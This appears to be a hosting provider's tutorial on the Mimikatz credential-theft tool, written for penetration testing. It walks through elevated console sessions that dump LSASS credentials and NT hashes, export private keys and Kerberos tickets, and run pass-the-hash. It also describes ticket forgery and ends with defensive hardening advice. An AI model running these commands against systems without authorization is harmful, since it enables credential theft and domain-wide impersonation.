What is Mimikatz?
Mimikatz is a tool written by the French developer Benjamin Delpy. It gathers credentials from a Windows host and carries out a range of operations used in penetration testing. It began as a demonstration of a design weakness in the Windows authentication package called WDigest. WDigest implements Digest authentication (used by HTTP and LDAP clients on a LAN or WAN) and, to answer authentication challenges on the user's behalf, it kept a copy of the plaintext password in the memory of the Local Security Authority Subsystem Service (LSASS) so that users only had to enter their password once. Anything able to read LSASS memory could therefore read the password as well.
As it turned out, he had created one of the most effective tools for exposing weaknesses in how Windows handles credentials. Penetration testers still use Mimikatz alongside other utilities when testing Windows security.
Here are five attack techniques that Mimikatz implements.
- Pass-the-hash — NTLM (Windows NT LAN Manager) authentication never sends the password itself; the client proves that it knows the NT hash, an unsalted MD4 digest of the UTF-16LE password. Because the hash alone is enough to answer the challenge, an attacker who has extracted it can authenticate as that user without ever cracking the password.
- Pass-the-Ticket — Kerberos is a network authentication protocol based on tickets, which let nodes communicating over an untrusted network prove their identity to one another. Mimikatz can extract a user's tickets from memory and inject them into another session, gaining access to services as that user.
- Kerberos Golden Ticket — The Key Distribution Center signs and encrypts every ticket-granting ticket (TGT) with the key of the krbtgt service account. An attacker holding the krbtgt NT hash (or AES key) can forge a TGT for any user with any group membership, which gives domain-administrator-level access to every computer in the domain until the krbtgt password has been changed twice.
- Kerberos Silver Ticket — A service ticket is encrypted with the key of the account that runs the service (often a computer account). With that key an attacker can forge a service ticket for that one service and impersonate any user to it, without contacting the domain controller at all.
- Pass-the-key — Kerberos derives a long-term key from the user's password (the RC4 key is the NT hash itself; the AES keys are derived with a salt). An attacker holding that key can request legitimate TGTs from the domain controller and impersonate the user for as long as the password stays unchanged.
Many companies still find the tool useful for finding and correcting weaknesses in how their Local Security Authority Subsystem Service (LSASS) protects credentials.
First, open a Command Prompt or PowerShell window as Administrator: press Win+X and choose the administrative shell from the menu, or press Win+R, type cmd and confirm with Ctrl+Shift+Enter. The sekurlsa commands shown below read LSASS memory and fail in a non-elevated session.
Next, obtain Mimikatz. Release builds can be downloaded from GitHub at https://github.com/gentilkiwi/mimikatz/releases as a .zip or .7z archive. Unpack it and, depending on your system, use the Win32 or x64 folder, then run mimikatz.exe from there. Mimikatz can also be built from the source code. Expect Microsoft Defender and most other antivirus products to flag and quarantine the binary as soon as it is downloaded; a test machine where that protection is deliberately disabled for the exercise (and re-enabled afterwards) is the usual answer.
Microsoft Windows [Version 10.0.19041.329]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Katherine>cd Downloads

C:\Users\Katherine\Downloads>cd mimikatz_trunk

C:\Users\Katherine\Downloads\mimikatz_trunk>cd x64

C:\Users\Katherine\Downloads\mimikatz_trunk\x64>.\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY gentilkiwi ( email@example.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( firstname.lastname@example.org )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz #
Let’s check whether Mimikatz works with the command ‘version’:
mimikatz # version

mimikatz 2.2.0 (arch x64)
Windows NT 10.0 build 19041 (arch x64)
msvc 150030729 207

mimikatz #
There exists a wide range of modules for varying purposes, but we are going to only review a few of the most popular ones.
Module standard – it contains short, general-purpose commands for working with the tool itself. Let's take a look at some of them:
- exit — quits the program;
- cls — clears the console;
- sleep — pauses for the given number of milliseconds:
mimikatz # sleep 4200
Sleep : 4200 ms... End !

mimikatz #
- answer – the developers also like to have fun: this command prints the answer to the ultimate question of life;
- cd – changes or shows the current directory;
- log – starts recording everything printed to the console into a log file (mimikatz.log unless another name is given):
mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz #
- coffee – when there is no free minute to spare, this command draws a virtual cup of coffee for a short break;
- base64 – switches input and/or output to base64, so that items that would otherwise be written to disk (exported tickets, for instance) are printed to the console instead.
Module privilege – it contains commands for manipulating the privileges of the Mimikatz process.
Let's enable SeDebugPrivilege (privilege 20) so that Mimikatz may open the LSASS process. This is not a privilege escalation: the command only enables a privilege that is already present in the token, so it succeeds only when the session is running as a member of the Administrators group:
mimikatz # privilege::debug
Privilege '20' OK

mimikatz #
Module crypto – this module works with the CryptoAPI and CNG (Cryptography Next Generation) functions.
providers – this command lists the CryptoAPI providers, the provider types and the CNG providers available on the machine:
mimikatz # crypto::providers

CryptoAPI providers :
 0. RSA_FULL     ( 1)    - Microsoft Base Cryptographic Provider v1.0
 1. DSS_DH       (13)    - Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
 2. DSS          ( 3)    - Microsoft Base DSS Cryptographic Provider
 3. RSA_FULL     ( 1) H  - Microsoft Base Smart Card Crypto Provider
 4. DH_SCHANNEL  (18)    - Microsoft DH SChannel Cryptographic Provider
 5. RSA_FULL     ( 1)    - Microsoft Enhanced Cryptographic Provider v1.0
 6. DSS_DH       (13)    - Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
 7. RSA_AES      (24)    - Microsoft Enhanced RSA and AES Cryptographic Provider
 8. RSA_SCHANNEL (12)    - Microsoft RSA SChannel Cryptographic Provider
 9. RSA_FULL     ( 1)    - Microsoft Strong Cryptographic Provider

CryptoAPI provider types:
 0. RSA_FULL     ( 1)    - RSA Full (Signature and Key Exchange)
 1. DSS          ( 3)    - DSS Signature
 2. RSA_SCHANNEL (12)    - RSA SChannel
 3. DSS_DH       (13)    - DSS Signature with Diffie-Hellman Key Exchange
 4. DH_SCHANNEL  (18)    - Diffie-Hellman SChannel
 5. RSA_AES      (24)    - RSA Full and AES

CNG providers :
 0. Microsoft Key Protection Provider
 1. Microsoft Passport Key Storage Provider
 2. Microsoft Platform Crypto Provider
 3. Microsoft Primitive Provider
 4. Microsoft Smart Card Key Storage Provider
 5. Microsoft Software Key Storage Provider
 6. Microsoft SSL Protocol Provider
 7. Windows Client Key Protection Provider

mimikatz #
keys – lists the keys held by a provider (by default the current user's store); with /export it also writes the private keys to files in the current directory. Only keys whose export policy allows it are written this way, as the "Exportable key : YES" line below shows; keys flagged as non-exportable can still be pulled after patching the provider with crypto::capi (CryptoAPI) or crypto::cng (CNG, which needs privilege::debug):
mimikatz # crypto::keys /export
 * Store         : 'user'
 * Provider      : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0')
 * Provider type : 'PROV_RSA_FULL' (1)
 * CNG Provider  : 'Microsoft Software Key Storage Provider'

CryptoAPI keys :

CNG keys :
 0. Microsoft Connected Devices Platform device certificate
    |Provider name : Microsoft Software Key Storage Provider
    |Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ;
    Key Container  : Microsoft Connected Devices Platform device certificate
    Unique name    : de7cf8a7901d2ad13e5c67c29e5d1662_4446d1b2-0875-4cc5-bdeb-4835813c706d
    Algorithm      : ECDSA_P256
    Key size       : 256 (0x00000100)
    Export policy  : 00000003 ( NCRYPT_ALLOW_EXPORT_FLAG ; NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG ; )
    Exportable key : YES
    LSA isolation  : NO
    Private export : OK - 'user_cng_0_Microsoft Connected Devices Platform device certificate.dsa.ec.p8k'

mimikatz #
Module sekurlsa – it extracts passwords, keys, PIN codes and tickets from LSASS memory. privilege::debug must have been run before using this module. Since Windows 8.1 and Windows Server 2012 R2 (and on older systems with update KB2871997 installed), WDigest no longer keeps plaintext passwords in memory by default; the behaviour is controlled by the UseLogonCredential value under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, which should be 0 or absent, and that value is worth checking on every host, since an attacker can set it to 1 and wait for the next logon. LSA Protection (RunAsPPL) and Credential Guard go further and block this module on a standard configuration.
logonpasswords – lists the credentials of every logon session held in memory. Even with WDigest caching disabled, the msv block still exposes the NT hash, which is all that pass-the-hash needs:
mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 143799 (00000000:000231b7)
Session           : Interactive from 1
User Name         : Katherine
Domain            : HOME-PC
Logon Server      : HOME-PC
Logon Time        : 7/8/2020 12:00:02 PM
SID               : S-1-5-21-1137163267-1680361566-2184406797-1001
        msv :
         Primary
         * Username   : Katherine
         * Domain     : HOME-PC
         * NTLM       : 19afbb31b09b2d5eb218675addf4e73c
         * SHA1       : e6770dc3e28e6755b49734a818ec7e17e69ef72f
        tspkg :
        wdigest :
         * Username   : Katherine
         * Domain     : HOME-PC
         * Password   : (null)
        kerberos :
         * Username   : Katherine
         * Domain     : HOME-PC
         * Password   : (null)
        ssp :
        credman :

mimikatz #
The following command demonstrates pass-the-hash: it starts a new cmd.exe whose logon session carries the supplied NT hash for the account Administrateur in the domain winxp, so anything that process does over the network authenticates as that account.
mimikatz # sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
user    : Administrateur
domain  : winxp
program : cmd
impers. : no
NTLM    : f193d757b4d487ab7e5a3743f038f713
  |  PID  3176
  |  TID  3188
  |  LSA Process was already R/W
  |  LUID 0 ; 408781 (00000000:00063ccd)
  \_ msv1_0   - data copy @ 000001F73964A3C0 : OK !
  \_ kerberos - data copy @ 000001F739ED3E78
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 000001F739681E78 (32) -> null

mimikatz #
pth (Pass-The-Hash) — starts the program given in /run in a new logon session and overwrites that session's credential material in LSASS with the supplied NTLM hash (or an AES key) instead of a real password; network authentication from that process then uses the injected material. Locally the process still runs under the original user's token, so the technique gives remote, not local, access as the target account.
tickets /export — reads the Kerberos tickets of every logon session directly from LSASS memory (unlike kerberos::list, which goes through the Kerberos API and sees only the current session) and writes each ticket to a .kirbi file. The standalone HOME-PC used here is not domain-joined, so all three groups below are empty; on a domain member each group lists the tickets found.
mimikatz # sekurlsa::tickets /export

Authentication Id : 0 ; 129210 (00000000:0001f8ba)
Session           : Interactive from 1
User Name         : Katherine
Domain            : HOME-PC
Logon Server      : HOME-PC
Logon Time        : 7/8/2020 12:47:21 PM
SID               : S-1-5-21-1137163267-1680361566-2184406797-1001

         * Username : Katherine
         * Domain   : HOME-PC
         * Password : (null)

        Group 0 - Ticket Granting Service
        Group 1 - Client Ticket ?
        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 7/8/2020 12:47:13 PM
SID               : S-1-5-19

         * Username : (null)
         * Domain   : (null)
         * Password : (null)

        Group 0 - Ticket Granting Service
        Group 1 - Client Ticket ?
        Group 2 - Ticket Granting Ticket

mimikatz #
Module kerberos – it works without special privileges through the official Microsoft Kerberos API, and given the right key material it can also forge tickets (golden and silver tickets) for any user.
ptt – injects a Kerberos ticket (for example an exported .kirbi file) into the current session (pass-the-ticket);
golden / silver – forges a TGT (a golden ticket, using the krbtgt key) or, with a service account's key, a service ticket for one service (a silver ticket), for any user and with whatever group membership is required (for example Domain Admins);
tgt – displays the ticket-granting ticket of the current session:
mimikatz # kerberos::tgt
Kerberos TGT of current session : no ticket !

mimikatz #
purge – removes all Kerberos tickets from the current session. The module contains many further commands.
There are many more commands and modules, and using them well requires an understanding of how authentication works in a Windows domain; the official project pages document them. A well-run domain limits what the techniques discussed here can achieve: plaintext credential caching disabled, LSA Protection or Credential Guard enabled, administrative accounts placed in the Protected Users group and used only on dedicated hosts, and the krbtgt password rotated (twice, to invalidate old tickets) on a schedule and immediately after any suspected compromise.
In this article we reviewed Mimikatz, learned where and how it can be used, and explained why it is both a useful test tool and a dangerous one in the hands of a malicious individual. We saw how to install it on Windows and noted some of the basic commands used to extract sensitive information.
Should you decide to employ this utility to test your Windows network, keep track of Mimikatz releases and the techniques they add, so that you understand the methods attackers use to reach credentials and can verify that your defences hold.
Our Support Teams are full of talented Linux technicians and System administrators who have an intimate knowledge of multiple web hosting technologies, especially those discussed in this article.
If you own a Fully Managed VPS server, Cloud Dedicated, VMWare Private Cloud, Private Parent server or Dedicated server and you are uncomfortable performing any of the steps outlined, we can be reached by phone at 800.580.4985, by chat or by support ticket to assist you with this process.